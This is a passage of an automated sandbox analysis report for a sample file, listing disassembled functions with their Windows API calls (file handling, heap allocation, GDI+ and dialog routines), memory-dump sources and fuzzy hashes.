                                                            • Opcode Fuzzy Hash: 6dad84ae9ade63569f79049d00dcc0374c8b853707a7244f253ba3fa2be032b0
                                                            • Instruction Fuzzy Hash: EC21C1B1504B846FE3309A66CC89BFB77ECEB5D324F044A19FA95C21D1C774A8848A71
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 001E9EC7
                                                            • GetLastError.KERNEL32 ref: 001E9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 2b720a58990b15c1f99e206575dcfd472f95614204cb7ba12f31a07804306d40
                                                            • Instruction ID: 87b004f7c89c10d5bc5688dfb5fa5c6fcde3a9c5591f0ff39d17fa91564e710d
                                                            • Opcode Fuzzy Hash: 2b720a58990b15c1f99e206575dcfd472f95614204cb7ba12f31a07804306d40
                                                            • Instruction Fuzzy Hash: BD112B31600B40EBD734C67ACC44BAEB7E9AB54370F504A29E653D26D0D7B0ED45C760
                                                            APIs
                                                            • _free.LIBCMT ref: 00208E75
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00221098,001E17CE,?,?,00000007,?,?,?,001E13D6,?,00000000), ref: 00208EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap$_free
                                                            • String ID:
                                                            • API String ID: 1482568997-0
                                                            • Opcode ID: cfde379571565353c03f5be97e67e8ef237c177b78452d426eae9bd71620cb7b
                                                            • Instruction ID: 530a34ea5939634317d201f75293ef86ce9a72d7dcdc6159bda01176df3848f7
                                                            • Opcode Fuzzy Hash: cfde379571565353c03f5be97e67e8ef237c177b78452d426eae9bd71620cb7b
                                                            • Instruction Fuzzy Hash: EAF0C232631303A6DB212E25EC04B6F37688F91B70F244126F9D8A61D3DF70DD3089A0
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 001F10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 001F10B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: b7b6027f8c394476282d46e17d51f8e439916553e6f022ac9861f802ace2adbc
                                                            • Instruction ID: b74c83ba2e2068864f869f3a342a969661fc64699941f59a56a125bcd24d68d7
                                                            • Opcode Fuzzy Hash: b7b6027f8c394476282d46e17d51f8e439916553e6f022ac9861f802ace2adbc
                                                            • Instruction Fuzzy Hash: 40E06522A00649F7CF09CAA4AC198FB72EEAA582443248179A603E3101EE30EE414AA0
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA501
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: dcf82bea9641cf370e89c8dfe0a8509a56f8cb8e369effe5fb16c2f9fc1b4bc2
                                                            • Instruction ID: 186f3ac8420b0b2e0aea1bd214af1baad83503851ba774b602a5f2f0548cd11d
                                                            • Opcode Fuzzy Hash: dcf82bea9641cf370e89c8dfe0a8509a56f8cb8e369effe5fb16c2f9fc1b4bc2
                                                            • Instruction Fuzzy Hash: F6F06532240249BBDF015F61DC45FDE3BADAF18385F448051B945D5164DB71DBD8DB50
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641,000000FF), ref: 001EA1F1
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,001E977F,?,?,001E95CF,?,?,?,?,?,00212641), ref: 001EA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: a5b2c83f6702ab23a2448410f02af0dfcebc8ffc906caa217b32a477a428dd63
                                                            • Instruction ID: c83a2f462a22c58cfe75d49af5bb383cab985099df79896635a8ab13bb0fbcb8
                                                            • Opcode Fuzzy Hash: a5b2c83f6702ab23a2448410f02af0dfcebc8ffc906caa217b32a477a428dd63
                                                            • Instruction Fuzzy Hash: 20E092311402496BDB019F61EC45FEE379DBF1C781F484021BA44E2060EB61DE84DA60
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00212641,000000FF), ref: 001FACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00212641,000000FF), ref: 001FACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: c63ab24ead996029d9894b39caa34b1f821ada57ef1c0d2986393b7a2771c199
                                                            • Instruction ID: 9296b70c0daeb3ff6f3597de27490eaa9f1e46dc7746e504b7e0bf0943db0dcf
                                                            • Opcode Fuzzy Hash: c63ab24ead996029d9894b39caa34b1f821ada57ef1c0d2986393b7a2771c199
                                                            • Instruction Fuzzy Hash: 06E06572604650EFC710EB58EC06B45FBEDFB99B20F104265F416D37A0CB74A841CA90
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,001EA23A,?,001E755C,?,?,?,?), ref: 001EA254
                                                              • Part of subcall function 001EBB03: _wcslen.LIBCMT ref: 001EBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001EA23A,?,001E755C,?,?,?,?), ref: 001EA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 28f8c6e1f49a166e419814c24ef92491f6eda6bd4021d904f294adc3b1123c78
                                                            • Instruction ID: 7bf0c8d8d9f6206b2fc02a0c74d7b0b1fefb18ad927b3a241bc35df20ff1d03a
                                                            • Opcode Fuzzy Hash: 28f8c6e1f49a166e419814c24ef92491f6eda6bd4021d904f294adc3b1123c78
                                                            • Instruction Fuzzy Hash: CDE092325001689BCF10EB64DC09BDDB799AB2C3E1F044261FE44E3190DB70DE44CAA0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001FDEEC
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 001FDF03
                                                              • Part of subcall function 001FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                              • Part of subcall function 001FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                              • Part of subcall function 001FB568: IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                              • Part of subcall function 001FB568: TranslateMessage.USER32(?), ref: 001FB5AC
                                                              • Part of subcall function 001FB568: DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 94b07dfdcae93c33572f5a61c834bfe2dea97226a18018f29b3f5b7e67e1d1aa
                                                            • Instruction ID: e7c847d7b1025bc78da8111ed7aa0208493009a5927fe89b6174b76a5949600d
                                                            • Opcode Fuzzy Hash: 94b07dfdcae93c33572f5a61c834bfe2dea97226a18018f29b3f5b7e67e1d1aa
                                                            • Instruction Fuzzy Hash: D5E09BB540438837DF11B761EC0AFEE37EC5B25785F440451B304DA0B2DB78D6118661
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 02ac4f4317a4df0226ec733f0af67cd98e7c7207ce534cc984022c92cd6beb83
                                                            • Instruction ID: 1e233cc83f7faae245b01ba6f622da1556bf84111be115fdd1ee90c071e864c2
                                                            • Opcode Fuzzy Hash: 02ac4f4317a4df0226ec733f0af67cd98e7c7207ce534cc984022c92cd6beb83
                                                            • Instruction Fuzzy Hash: 25E09A728002286ACB01ABA0AC08FEA7BADEF1C3D1F040065B608E2004DB74DA808AA0
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001FA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001FA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: 5c2ac790db437e485ab5cb61ba2972a035bd350d198abe511eed257369613ee1
                                                            • Instruction ID: 57405602d98779533ea8664722d4397fdd545b610fd767939486fe4cc6a7f625
                                                            • Opcode Fuzzy Hash: 5c2ac790db437e485ab5cb61ba2972a035bd350d198abe511eed257369613ee1
                                                            • Instruction Fuzzy Hash: 41E0EDB190021CEBCB10DF55C5416A9BBE8EF14360F10805AA94A93251E374AE44DB91
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00202BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00202BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            APIs
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E8289
                                                              • Part of subcall function 001E13DC: __EH_prolog.LIBCMT ref: 001E13E1
                                                              • Part of subcall function 001EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001EA598
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E13E1
                                                              • Part of subcall function 001E5E37: __EH_prolog.LIBCMT ref: 001E5E3C
                                                              • Part of subcall function 001ECE40: __EH_prolog.LIBCMT ref: 001ECE45
                                                              • Part of subcall function 001EB505: __EH_prolog.LIBCMT ref: 001EB50A
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E13E1
                                                              • Part of subcall function 001E5E37: __EH_prolog.LIBCMT ref: 001E5E3C
                                                              • Part of subcall function 001ECE40: __EH_prolog.LIBCMT ref: 001ECE45
                                                              • Part of subcall function 001EB505: __EH_prolog.LIBCMT ref: 001EB50A
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001FB098
                                                              • Part of subcall function 001E13DC: __EH_prolog.LIBCMT ref: 001E13E1
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                              • Part of subcall function 0020B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00209813,00000001,00000364,?,002040EF,?,?,00221098), ref: 0020B177
                                                            • _free.LIBCMT ref: 0020C4E5
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00209813,00000001,00000364,?,002040EF,?,?,00221098), ref: 0020B177
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00203C3F
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 28a477daa520b36c238446017aa1245529a2bca0983d262aa0378bea509b8f36
                                                            • Instruction ID: a7f35daf6a189868ad23cfcce5bb040d39c5d1532ba9284f088d81f68ae60607
                                                            • Opcode Fuzzy Hash: 28a477daa520b36c238446017aa1245529a2bca0983d262aa0378bea509b8f36
                                                            • Instruction Fuzzy Hash: 99F08C362203179FEF11CEA9EC04A9A77ADAF15B617144126FA05E61D1DB31DA70CB90
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ca93fcfad1d657afb180f8dabcc6044105d4cb07fa6b3be9907e9d30644380b8
                                                            • Instruction ID: f187887ebcc39335258ab4fcafaafcdd9b7d34c16c613e2b9dfd826ac574706b
                                                            • Opcode Fuzzy Hash: ca93fcfad1d657afb180f8dabcc6044105d4cb07fa6b3be9907e9d30644380b8
                                                            • Instruction Fuzzy Hash: F7E0ED3123232657EB712E22EC08B9B76989B423B0F110121BC88960C3CF60CC2086E9
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E5AC2
                                                              • Part of subcall function 001EB505: __EH_prolog.LIBCMT ref: 001EB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 686ca911b482d5f4b6d3a3922aa0e1dffb1691eef1d57642338077a443609745
                                                            • Instruction ID: 77f8f685f9810425d541df331db35e929f72850f69b470ec90b2d1f2e7635b4d
                                                            • Opcode Fuzzy Hash: 686ca911b482d5f4b6d3a3922aa0e1dffb1691eef1d57642338077a443609745
                                                            • Instruction Fuzzy Hash: 80018C308106D8DAD726E7B8C0517EEFBE49F78304F54848DA55693383CBB41B08D7A2
                                                            APIs
                                                              • Part of subcall function 001EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6C4
                                                              • Part of subcall function 001EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6F2
                                                              • Part of subcall function 001EA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001EA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 3215447bccdb3b26de22553d13b6d863e51b60118dbd2bb6d327b392cf4ab78e
                                                            • Instruction ID: 38e8870473858229aebdcb6aca6797dd60c9dc956ce1933dfcb4e5a4a8c2740e
                                                            • Opcode Fuzzy Hash: 3215447bccdb3b26de22553d13b6d863e51b60118dbd2bb6d327b392cf4ab78e
                                                            • Instruction Fuzzy Hash: 3BF08231008BD0AACB2257B58904BCFBBD06F2A331F548B49F1FD62196C37560949B23
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 001F0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 8949cb0a982df3604e2b4d1931fc56a9c92ff4c6c9feba7db7145bc181e821f5
                                                            • Instruction ID: f22e8fd30dcf07f72efd0c7ff5326998d134e4923931c8b6be97678827b01316
